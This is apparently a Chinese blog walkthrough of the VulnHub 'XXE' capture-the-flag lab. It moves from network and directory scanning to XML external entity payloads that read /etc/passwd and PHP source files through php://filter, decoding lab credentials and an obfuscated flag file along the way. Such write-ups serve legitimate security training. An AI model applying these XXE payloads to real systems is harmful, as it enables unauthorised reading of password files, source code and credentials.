vulnhub-XXE靶機滲透
阿新 • • 發佈:2019-08-25
下載連結:https://download.vulnhub.com/xxe/XXE.zip
0x01 確定目標IP
目標網路模式預設為net模式,無需修改
使用arp-scan或者netdiscover確定目標ip
arp-scan -l 或者 netdiscover -i eth1 目標ip為 192.168.88.128
探測埠,發現目標機器只開啟了80埠
訪問web服務發現為apache預設頁面,猜測存在隱藏目錄
0x02 目錄爆破
dirb http://192.168.88.128 只掃到一個robots.txt檔案
訪問 http://192.168.88.128/robots.txt 一個/xxe/目錄,有個後臺頁面
先訪問xxe目錄 http://192.168.88.128/xxe/
輸入使用者名稱密碼進行抓包分析
可以看到使用者名稱密碼是通過xml傳遞給後端的
0x02 xxe漏洞利用
burp抓包,修改post體,嘗試讀取/etc/passwd
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "file:///etc/passwd">
]>
<root><name>&admin;</name><password>1</password></root>
接下來我們可以使用php://filter/read=convert.base64-encode/resource=admin.php讀取admin.php的原始碼。
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>
<root><name>admin</name><password>admin</password></root>
返回包進行了加密,無法直接找到flag
base64解碼:找到使用者名稱密碼 administhebest/e6e061838856bf47e1de730719fb2609
對password密文進一步解碼,獲得使用者名稱密碼:administhebest/admin@123
使用賬戶名密碼登入admin.php
http://192.168.88.128/xxe/admin.php
點選登入出現的一個紅色的flag字樣
當點選flag會跳轉web根目錄http://192.168.88.128/flagmeout.php 一個空白頁
檢視也頁面原始碼獲得flag提示
<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->
先進行base32 解碼,再進行base64解碼
檢視/etc/.flag.php原始碼
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">
]>
<root><name>&admin;</name><password>admin</password></root>
base64解碼:看不懂是啥東西,將返回內容複製儲存為php
開啟web服務 php -S 0.0.0.0:8090 -t /root
返回的還是剛才那串字元
前後分別加上<?php ?> 重新儲存為php
<?php JF9bXSsrOyRfW109JF8uXzskX19fX189JF9bKCsrJF9fW10pXVsoKyskX19bXSkrKCsrJF9fW10pKygrKyRfX1tdKV07JF89JF9bJF9bK19dXTskX19fPSRfXz0kX1srKyRfX1tdXTskX19fXz0kXz0kX1srX107JF8rKzskXysrOyRfKys7JF89JF9fX18uKyskX19fLiRfX18uKyskXy4kX18uKyskX19fOyRfXz0kXzskXz0kX19fX187JF8rKzskXysrOyRfKys7JF8rKzskXysrOyRfKys7JF8rKzskXysrOyRfKys7JF8rKzskX19fPStfOyRfX18uPSRfXzskX19fPSsrJF9eJF9fX1srX107JMOAPStfOyTDgT0kw4I9JMODPSTDhD0kw4Y9JMOIPSTDiT0kw4o9JMOLPSsrJMOBW107JMOCKys7JMODKys7JMODKys7JMOEKys7JMOEKys7JMOEKys7JMOGKys7JMOGKys7JMOGKys7JMOGKys7JMOIKys7JMOIKys7JMOIKys7JMOIKys7JMOIKys7JMOJKys7JMOJKys7JMOJKys7JMOJKys7JMOJKys7JMOJKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JF9fKCckXz0iJy4kX19fLiTDgS4kw4IuJMODLiRfX18uJMOBLiTDgC4kw4EuJF9fXy4kw4EuJMOALiTDiC4kX19fLiTDgS4kw4AuJMODLiRfX18uJMOBLiTDgi4kw4MuJF9fXy4kw4EuJMOCLiTDgC4kX19fLiTDgS4kw4kuJMODLiRfX18uJMOBLiTDiS4kw4AuJF9fXy4kw4EuJMOJLiTDgC4kX19fLiTDgS4kw4QuJMOGLiRfX18uJMOBLiTDgy4kw4kuJF9fXy4kw4EuJMOGLiTDgS4kX19fLiTDgS4kw4guJMODLiRfX18uJMOBLiTDgy4kw4kuJF9fXy4kw4EuJMOILiTDgy4kX19fLiTDgS4kw4YuJMOJLiRfX18uJMOBLiTDgy4kw4kuJF9fXy4kw4EuJMOELiTDhi4kX19fLiTDgS4kw4QuJMOBLiRfX18uJMOBLiTDiC4kw4MuJF9fXy4kw4EuJMOJLiTDgS4kX19fLiTDgS4kw4kuJMOGLiciJyk7JF9fKCRfKTsK
?&g